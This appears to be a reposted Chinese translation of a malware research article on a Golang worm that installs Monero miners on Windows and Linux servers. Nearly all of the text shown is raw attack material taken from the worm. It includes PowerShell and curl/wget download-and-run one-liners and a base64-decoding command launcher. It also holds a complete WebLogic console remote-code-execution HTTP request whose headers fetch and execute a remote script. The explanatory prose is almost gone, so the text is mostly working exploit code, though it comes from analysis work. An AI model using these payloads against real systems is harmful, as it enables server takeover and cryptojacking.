Golang蠕虫将Windows和Linux服务器变成门罗币挖矿机. 2021-01-07
cmd@/c@powershell iex(New-Object Net.WebClient).DownloadString(‘%s’)!bash@-c@(curl -fsSL %s || wget -q -O – %s) | bash println “%s”+”%s”;def s=new String(Base64.getDecoder().decode(“%s”+”%s”.reverse())).split(“!”);def c=System.getProperty(“os.name”).contains(“indo”)?s[0].split(“@”):s[1].split(“@”);c.execute() WebLogic: Port 7001
GET /console/css/%%25%%32%%65%%25%%32%%65%%25%%32%%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(‘weblogic.work.ExecuteThread %%20currentThread(weblogic.work.ExecuteThread)Thread.currentThread();weblogic.work. WorkAdapter%%20adapter=currentThread.getCurrentWork();java.lang.reflect.Field%%20 field=adapter.getClass().getDeclaredField(“connectionHandler”);field.setAccessible (true);Object%%20obj=field.get(adapter);weblogic.servlet.internal.ServletRequestI mpl%%20req(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod (“getServletRequest”).invoke(obj);String%%20cmd=req.getHeader(“cmd”);String[]%% 20cmds=System.getProperty(“os.name”).toLowerCase().contains(“win”)?new%%20String[]{“cmd.exe”,”/c”,req.getHeader(“win”)}:new%%20String[]{“/bin/sh”,”c”,req.getHeader (“linux”)};if(cmd!=null{String%%20result=new%%20java.util.Scanner(new%%20java.lang .ProcessBuilder(cmds).start().getInputStream()).useDelimiter(“%%5C%%5CA”).next(); weblogic.servlet.internal.ServletResponseImpl%%20res(weblogic.servlet.internal. ServletResponseImpl)req.getClass().getMethod(“getResponse”).invoke(req);work. getServletOutputStream().writeStream(new%%20weblogic.xml.util.StringInputStream (result));work.getServletOutputStream().flush ();}currentThread.interrupt();’) HTTP/1.0 Host: %s:%d User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: close cmd: ls linux: ( (curl -fsSL %s || wget -q -O – %s) | bash& ) win: start powershell iex(New-Object Net.WebClient).DownloadString(‘%s’)
转自嘶吼网/ang010ela
本文翻译自:https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/